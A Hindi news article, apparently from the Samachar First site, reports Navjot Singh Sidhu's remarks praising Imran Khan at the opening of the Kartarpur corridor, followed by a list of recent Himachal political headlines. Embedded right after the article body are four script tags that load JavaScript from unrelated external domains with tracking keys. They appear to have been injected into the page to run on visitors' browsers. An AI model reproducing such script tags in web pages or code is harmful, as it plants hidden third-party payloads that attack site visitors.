Categories: इंडिया

नवजोत सिंह सिद्धू ने इस अंदाज में की पाकिस्तान के प्रधानमंत्री इमरान ख़ान की तारीफ़

<p>करतापुर कॉरिडोर के उद्घाटन के मौक़े पर बतौर ख़ास अतिथि पहुंचे कांग्रेस नेता और पूर्व क्रिकेटर नवजोत सिंह सिद्धू ने पाकिस्तान के प्रधानमंत्री इमरान ख़ान की तारीफ़ कुछ अलग अंदाज में की। हालांकि दो बार उन्होंने भारत के प्रधानमंत्री को भी शुक्रिया कहा। सिद्धू अपने लतीफ़ों और काव्यात्मक भाषणों के लिए जाने जाते हैं और इस बार भी उनका अंदाज़ वही था। वह पहले भी खुलकर पाकिस्तान के प्रधानमंत्री की तारीफ़ करते रहे हैं और इस बार भी उन्होंने कोई कसर नहीं छोड़ी। इमरान ख़ान को वो अपना दोस्त बताते रहे हैं और इस बार भी उनका अंदाज़ वैसा ही दोस्ताना था। सिद्धू ने कहा कि पाकिस्तान के प्रधानमंत्री इमरान ख़ान में 14 करोड़ सिखों का विश्वास हैं। वो एक जीता-जागता इतिहास है। जिन्होंने कोई नफ़ा-नुकसान नहीं देखा, कोई सौदा नहीं देखा, सिर्फ़ और सिर्फ़ ईश्वर के नाम पर यह क़दम उठाया है।</p>

<p>इस मौक़े पर सिद्धू ने कहा कि ये कहां का इंसाफ़ है कि कोई अपने पिता से नहीं मिल सके। मेरे अपने लोग यहां की सरज़मीं को चूमने के लिए रोते रहे। बंटवारे के बाद से यह पहला मौक़ा है जब 14 करोड़ सिख अपने इस घर आ पाएंगे। इसका सिर्फ़ एक कारण इमरान ख़ान हैं जिन्होंने भारत की ओर दोस्ती का हाथ बढ़ाया। निश्चित तौर पर ताली दोनों हाथ से बजी है। भारत के प्रधानमंत्री नरेंद्र मोदी ने भी 14 करोड़ सिखों की बात सुनी है।</p>

<p>पाकिस्तान में मौजूद यह गुरुद्वारा सिखों और दूसरे पंजाबियों के लिए बहुत महत्व रखता है क्योंकि सिख धर्म के संस्थापक गुरु नानक देव ने अपनी ज़िंदगी के अंतिम 18 साल यहीं बिताए थे। सीमा की दोनों तरफ एंट्री पॉइंट के खुलने की शुरुआत गुरु नानक देव के 550वें जन्मदिवस पर हुई।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1573365072733″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

हिमाचल प्रदेश मे 1.92 लाख किसान कर रहे प्राकृतिक खेती

हिमाचल प्रदेश मे 1.92 लाख किसान कर रहे प्राकृतिक खेती , प्रदेश मे 28 हजार…

5 hours ago

कांग्रेस सत्ता में आई तो पहली नौकरी की गारंटी पक्की: आनंद शर्मा

कांग्रेस सत्ता में आई तो पहली नौकरी की गारंटी पक्की: आनंद शर्मा पीएम मोदी का…

5 hours ago

मतदाताओं को मतदान का संदेश देने के लिए साइकलिंग एक्सपीडिशन स्पीति पहुंची

दुनिया के सबसे ऊंचे पोलिंग बूथ टशीगंग से साइकिल सवार देश के मतदाताओं को मतदान…

12 hours ago

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू-माफिया: CM

राजनीतिक मंडी में बिके हमीरपुर जिला के तीन विधायक खनन व भू- माफिया : मुख्यमंत्री…

12 hours ago

बैजनाथ सहित अन्य विधानसभा क्षेत्र में सहायक मतदान केन्द्र होंगे स्थापित

विधानसभा क्षेत्र 20-बैजनाथ (अ.जा.) के 99-बड़ाभंगाल और 54-कसौली (अ.जा.) के 27-ढिल़्लों में सहायक मतदान केन्द्र…

12 hours ago

हिमाचल की चारों सीटों पर प्रचंड बहुमत से कमल खिलेगा: BJP

भारतीय जनता पार्टी के राष्ट्रीय अध्यक्ष जगत प्रकाश नड्डा द्वारा हिमाचल प्रदेश के नूरपुर, चंबा…

12 hours ago